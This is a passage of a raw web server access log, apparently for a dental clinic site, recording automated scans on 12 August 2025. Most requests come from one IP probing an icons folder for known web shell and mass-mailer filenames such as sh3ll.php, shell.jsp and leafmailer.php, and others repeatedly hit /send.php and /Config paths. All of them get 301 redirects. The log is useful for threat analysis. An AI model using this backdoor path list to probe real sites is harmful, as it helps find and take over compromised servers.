Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:22 -0400] "GET /our-clinics/img/icons/wp-pano.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:23 -0400] "GET /our-clinics/img/icons/mo.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:23 -0400] "GET /our-clinics/img/icons/start.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:24 -0400] "GET /our-clinics/img/icons/setup-config.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:24 -0400] "GET /our-clinics/img/icons/ms-edit.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:25 -0400] "GET /our-clinics/img/icons/2index.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:25 -0400] "GET /our-clinics/img/icons/wp-class.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:25 -0400] "GET /our-clinics/img/icons/view.html.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:26 -0400] "GET /our-clinics/img/icons/c.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:26 -0400] "GET /our-clinics/img/icons/web.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:27 -0400] "GET /our-clinics/img/icons/delcheck.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:27 -0400] "GET /our-clinics/img/icons/alexusMailer_v2.0.php HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:27 -0400] "GET /our-clinics/img/icons/testsend.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:28 -0400] "GET /our-clinics/img/icons/years.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:28 -0400] "GET /our-clinics/img/icons/sh3ll.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:29 -0400] "GET /our-clinics/img/icons/comments.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:29 -0400] "GET /our-clinics/img/icons/shell20211028.php HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:30 -0400] "GET /our-clinics/img/icons/dn.jsp HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:30 -0400] "GET /our-clinics/img/icons/smtp.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:30 -0400] "GET /our-clinics/img/icons/sx.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:31 -0400] "GET /our-clinics/img/icons/option.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:31 -0400] "GET /our-clinics/img/icons/403.html HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:32 -0400] "GET /our-clinics/img/icons/.tmb35r2a3366 HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:32 -0400] "GET /our-clinics/img/icons/wp-act.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:33 -0400] "GET /our-clinics/img/icons/headers.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:33 -0400] "GET /our-clinics/img/icons/cart.php.malware HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:33 -0400] "GET /our-clinics/img/icons/rotexmailer-new.php HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:34 -0400] "GET /our-clinics/img/icons/import.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:34 -0400] "GET /our-clinics/img/icons/wp-sign.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:35 -0400] "GET /our-clinics/img/icons/include.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:35 -0400] "GET /our-clinics/img/icons/u.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:35 -0400] "GET /our-clinics/img/icons/4.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:36 -0400] "GET /our-clinics/img/icons/403.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:36 -0400] "GET /our-clinics/img/icons/404.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:37 -0400] "GET /our-clinics/img/icons/v2.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:37 -0400] "GET /our-clinics/img/icons/Shell.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:38 -0400] "GET /our-clinics/img/icons/.login-w.jsp HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:38 -0400] "GET /our-clinics/img/icons/logos.jsp HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:38 -0400] "GET /our-clinics/img/icons/HelloHTML.jsp HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:39 -0400] "GET /our-clinics/img/icons/favic0n.jsp HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:39 -0400] "GET /our-clinics/img/icons/config1.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:40 -0400] "GET /our-clinics/img/icons/ava.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:40 -0400] "GET /our-clinics/img/icons/xc.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:41 -0400] "GET /our-clinics/img/icons/adminfuns.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:41 -0400] "GET /our-clinics/img/icons/ioxi11.PhP7 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:41 -0400] "GET /our-clinics/img/icons/special.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:42 -0400] "GET /our-clinics/img/icons/ova-tools-cp-os.php HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:42 -0400] "GET /our-clinics/img/icons/connects.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:43 -0400] "GET /our-clinics/img/icons/20170219.jsp HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:43 -0400] "GET /our-clinics/img/icons/aa.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:44 -0400] "GET /our-clinics/img/icons/lf.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:44 -0400] "GET /our-clinics/img/icons/csss.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:44 -0400] "GET /our-clinics/img/icons/footer.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:45 -0400] "GET /our-clinics/img/icons/header.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:45 -0400] "GET /our-clinics/img/icons/int.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:46 -0400] "GET /our-clinics/img/icons/template.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:46 -0400] "GET /our-clinics/img/icons/up.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:47 -0400] "GET /our-clinics/img/icons/ssl.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:47 -0400] "GET /our-clinics/img/icons/leafmailer.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:47 -0400] "GET /our-clinics/img/icons/ss.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:48 -0400] "GET /our-clinics/img/icons/Thumbs.jsp HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:48 -0400] "GET /our-clinics/img/icons/.login-n.jsp HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:50 -0400] "GET /our-clinics/img/icons/shell.jsp HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:50 -0400] "GET /our-clinics/img/icons/id.jsp HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:50 -0400] "GET /our-clinics/img/icons/dx.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 149.102.237.41 - - [12/Aug/2025:10:39:37 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:10:39:37 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:10:39:37 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:10:39:44 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:10:40:06 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:10:41:46 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:10:41:46 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:10:41:46 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:10:41:49 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:10:43:40 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:10:43:40 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:10:43:40 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:10:43:40 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 152.42.157.60 - - [12/Aug/2025:10:45:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:10:45:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:10:45:51 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:10:45:52 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 4.43.184.114 - - [12/Aug/2025:10:49:24 -0400] "GET / HTTP/1.0" 301 231 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru)" 149.102.237.41 - - [12/Aug/2025:10:54:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:10:54:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:10:54:18 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:10:54:38 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:10:56:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:10:56:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:10:56:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:10:56:48 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.203.144 - - [12/Aug/2025:11:00:43 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:11:00:43 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 209.38.125.40 - - [12/Aug/2025:11:00:43 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:11:00:43 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 31.13.127.6 - - [12/Aug/2025:11:02:50 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 156.146.41.214 - - [12/Aug/2025:11:08:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:11:08:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.102.237.37 - - [12/Aug/2025:11:08:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - 